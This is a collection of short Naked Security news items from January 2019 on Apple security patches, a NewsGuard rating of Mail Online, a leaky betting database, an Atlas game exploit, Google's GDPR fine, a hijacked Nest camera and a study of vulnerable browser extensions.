Update now! Apple releases first 2019 iOS and macOS patches

By John E Dunn

Apple has issued its January security updates fixing a list of mostly shared CVE flaws affecting iOS and macOS with a smattering for Safari, watchOS, tvOS, and iCloud for Windows.

iOS v12.1.3

This latest version fixes a sizable list of CVEs for the iPhone 5s and later, and the iPad and iPod Touch 6^th Generation. Almost all were reported to Apple by external researchers.

Among the interesting ones is CVE-2019-6200, a remote code execution (RCE) Bluetooth flaw, and CVE-2019-6224, another RCE an attacker might exploit through FaceTime.

Fixes for the WebKit browser engine make up another nine CVEs, including CVE-2019-6229 which might allow cross-site scripting through a malicious web page.

Kernel-level flaws account for six CVEs, all of which would allow an attacker able to sneak a malicious app past Apple to elevate privileges, break out of the sandbox, or execute malicious code.

The update should appear without intervention or you can check manually by clicking Settings > General > Software Update.

Read more at https://nakedsecurity.sophos.com/2019/01/24/update-now-apple-releases-first-2019-ios-and-macos-patches/

“Proceed with caution”: Microsoft browser says Mail Online is untrustworthy

By Lisa Vaas

As legislators and the public have bludgeoned them with complaints about how they’ve let fake news melt democracy, tech big boys such as Microsoft and Facebook have said hey, that ain’t our thing – we’ll get fact-checkers to take this slapping for us.

Bring it on, said one of those fact-checking services. The buck stops right here, said third-party startup NewsGuard… following it having glued an “untrustworthy” badge onto the Daily Mail’s journalism, which includes the Mail on Sunday and Mail Online.

As part of Microsoft’s attempt to stop the spread of malarkey, the company has preinstalled NewsGuard’s messages into its Microsoft Edge browser on Android and iOS. Thus, as of this week, Edge users are seeing messages saying that Mail Online rates a one out of five for credibility: “the same level as the Kremlin-backed RT news service,” as The Guardian reports.

The Daily Mail is a UK tabloid that’s second only to The Sun for daily newspaper readership. It, along with its online outlets, have been rated by NewsGuard as “generally fail[ing] to maintain basic standards of accuracy and accountability.”

According to The Guardian (which, according to PC Mag, NewsGuard has rated as trustworthy), Microsoft Edge users who visit Mail Online will now see a small shield icon in the URL bar at the top of the screen. It asserts that the website…

…generally fails to maintain basic standards of accuracy and accountability… [and] has been forced to pay damages in numerous high-profile cases.

Readers should tread with caution, NewsGuard says, given that…

…the site regularly publishes content that has damaged reputations, caused widespread alarm, or constituted harassment or invasion of privacy.

NewsGuard is also warning that the Daily Mail sites fail to “handle the difference between news and opinion responsibly” and fail to reveal “who’s in charge, including any possible conflicts of interest.”

Read more at https://nakedsecurity.sophos.com/2019/01/24/proceed-with-caution-microsoft-browser-says-mail-online-is-untrustworthy/

100 million online bets exposed by leaky database

By John E Dunn

Yet another organization has been spotted copying important data to Elasticsearch cloud storage without remembering to secure it.

Last week, it was US company VOIPo that accidentally exposed call logs, SMS data, and company credentials in Elasticsearch where it was spotted by researcher Justin Paine.

This week, Paine has returned to tell ZDNet of a second cache of Elasticsearch data he found only days ago that appears to have been connected to online betting sites.

Sensitive data such as:

Real names, home addresses, phone numbers, email addresses, birth dates, site usernames, account balances, IP addresses, browser and OS details, last login information, and a list of played games.

In addition, Paine found 108 million records connected to online bets, deposits, wins and withdrawals, complete with partially redacted payment card data.

According to ZDNet, the betting domains included kahunacasino.com, azur-casino.com, easybet.com, and viproomcasino.net, connected to companies registered in Cyprus and the Caribbean.

Read more at https://nakedsecurity.sophos.com/2019/01/23/100-million-online-bets-exposed-by-leaky-database/

PewDiePie-spammers and whale-flingers exploit hole in Atlas game

By Lisa Vaas

The newly launched Atlas game has pirates, a fountain of youth, ramshackle sloops, naval battles, submarines, and guillotines.

What Grapeshot Games’s MMO (Massively Multiplayer Online) game is not supposed to have: a flood of whales, spawning in water, on land and sometimes in mid-air.

That, however, is what happened after multiple players found and exploited a vulnerability in the Atlas game itself. On Sunday, an assistant community manager wrote on the Atlas community forum that the game maker had to do “emergency maintenance” at 09:00 am UTC, rolling back the game and wiping out players’ gains in the five and a half hours since the exploit enabled the infliction of whales.

Multiple accounts were eventually banned. But before the game admins had a chance to close the hole, the whale-flingers got bored and they, and/or others, started flooding the servers with dragons… after which some players exploited the vulnerability by spamming players to exhort them to subscribe to PewDiePie… for hours.

Read more at https://nakedsecurity.sophos.com/2019/01/23/pewdiepie-spammers-and-whale-flingers-exploit-hole-in-atlas-game/

Google fined $57m for data protection violations

By Danny Bradbury

In a landmark ruling, France’s data protection commissioner has fined Google €50m (around $57m) for violating Europe’s General Data Protection Regulation (GDPR). The fines penalize the search and advertising giant for not giving information to users or obtaining valid consent when gathering data to personalize advertisements.

The fines are the result of an investigation into Google lasting almost eight months. It began when advocacy group None of Your Business (NOYB) filed a complaint against Google with data protection regulators in Austria, Belgium, Germany and France last May, shortly after GDPR came into force. The French regulator also received a similar complaint from French digital rights advocacy group La Quadrature du Net (LQDN).

France’s regulator, the Commission Nationale de l’Informatique et des Libertés (CNIL), announced on Monday that it agreed with the complaints, finding that Google “excessively” spread privacy information across several places during the Google account creation process.

This information includes what the data would be used for, how long it would be stored, and the types of personal data used to personalize ads. This made it hard for users to discover this information, the CNIL ruling says:

The relevant information is accessible after several steps only, implying sometimes up to 5 or 6 actions. For instance, this is the case when a user wants to have a complete information on his or her data collected for the personalization purposes or for the geo-tracking service.

Even when users do find that information, it is often vague, the CNIL adds. There are so many services collecting so much data that it is difficult for users to understand everything that their data will be used for.

Read more at https://nakedsecurity.sophos.com/2019/01/23/france-fines-google-57m-under-gdpr/

Hijacked Nest cam broadcasts bogus warning about incoming missiles

By Lisa Vaas

A hacker took over a Nest security camera to broadcast a fake warning about three incoming intercontinental ballistic missiles (ICBM) launched from North Korea, sending a family into “five minutes of sheer terror.”

Laura Lyons, of Orinda, California, told the Mercury News that she was preparing food in her kitchen on Sunday when a “loud squawking – similar to the beginning of an emergency broadcast alert” blasted from the living room, followed by a detailed warning about missiles headed to Los Angeles, Chicago and Ohio.

The newspaper quotes her:

It warned that the United States had retaliated against Pyongyang and that people in the affected areas had three hours to evacuate. It sounded completely legit, and it was loud and got our attention right off the bat… It was five minutes of sheer terror and another 30 minutes trying to figure out what was going on.

Her frightened 8-year-old son crawled under the rug while Lyons and her husband looked at the TV in confusion: why was the station airing the NFC Championship football game, instead of an emergency broadcast?

The couple eventually realized that the warning was coming from their Nest security camera, perched on top of the TV. After multiple calls to 911 – the US emergency number – and to Nest, they eventually figured out that they’d been the victims of a prank. A Nest supervisor told them on Sunday that they’d likely been victims of a “third-party data breach” that gave the webcam hijacker access to the Nest camera and its speakers.

Read more at https://nakedsecurity.sophos.com/2019/01/23/hijacked-nest-cam-broadcasts-bogus-warning-about-incoming-missiles/

Rogue websites can turn vulnerable browser extensions into back doors

By John E Dunn

When was the last time you checked the permissions asked for by a browser add-on?

It’s a blind spot: we might know that app permissions can be risky but when it comes to extensions for browsers such as Chrome and Firefox there is a tendency to worry about it only when someone discovers a malicious extension doing something it shouldn’t.

But it’s not only malicious extensions that can be a problem, as highlighted by a newly published study by Université Côte d’Azur researcher, Dolière Francis Somé, which analyses deeper-level APIs.

Extensions can do things that websites can’t. Websites are protected and restricted by Same Origin Policy (SOP) policy – the layer that restricts websites on different domains from sharing data.

Somé was interested in whether a rogue extension could bypass these basic SOP protections by exploiting privileged browser extensions, maliciously gaining access to user data, browsing history, user credentials, or to download files in storage.

Sure enough, after analyzing 78,315 Chrome, Firefox and Opera extensions that used the WebExtensions API using a mixture of static analysis and manual review, the answer in 197 cases was yes, it could.

All told, 171 of the 197 were Chrome Extensions, which reflects the much greater number of extensions available for this browser rather than any inherent security advantage of Firefox and Opera. 16 and 10 extensions were found for these browsers respectively.

Read more at https://nakedsecurity.sophos.com/2019/01/22/rogue-websites-can-turn-vulnerable-browser-extensions-into-back-doors/